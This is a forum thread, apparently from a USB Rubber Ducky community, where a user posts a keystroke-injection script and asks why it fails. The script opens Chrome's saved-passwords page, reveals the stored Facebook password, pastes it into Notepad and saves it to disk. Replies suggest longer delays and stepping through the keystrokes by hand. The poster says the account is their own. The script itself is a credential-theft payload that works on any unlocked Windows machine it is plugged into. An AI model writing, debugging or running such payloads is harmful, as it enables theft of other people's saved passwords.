Jump to content

What is wrong with this script


RubberMic
 Share

Recommended Posts

just got my ducky and tried to take the password of my Facebook account using chrome saved passwords. (I'm running on win 8.1 just to clarify) but this script that i tried to write doesn't seem to work. can anyone see why this seems to not work????

this is the script:

DELAY 500
GUI D
DELAY 500
GUI R
DELAY 500
STRING chrome
DELAY 500
ENTER
STRING chrome://settings/passwords
DELAY 500
ENTER
STRING facebook
DELAY 500
TAB
DOWNARROW
TAB
ENTER
TAB
TAB
TAB
TAB
TAB
TAB
CTRL C
DELAY 500
GUI R
DELAY 100
STRING notepad.exe
CTRL V
DELAY 100
ALT f
DELAY 100
STRING s
TAB
TAB
TAB
TAB
TAB
TAB
ENTER
STRING C:\Users\Zem The Mattress\Music\
ENTER
TAB
TAB
TAB
TAB
TAB
TAB
STRING hello
ENTER
Link to comment
Share on other sites

Well it is written in Ducky script so looks like ****, that's your first problem :)

But really, enter the commands on a keyboard and see where the problem occurs? If everything works OK it is possibly a delay related issue.

Link to comment
Share on other sites

  • 3 weeks later...

I agree with Oli. Also, try to increase the delays on the rubber ducky. It can sometimes be difficult for Windows to keep up with the speed of the keyboard.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...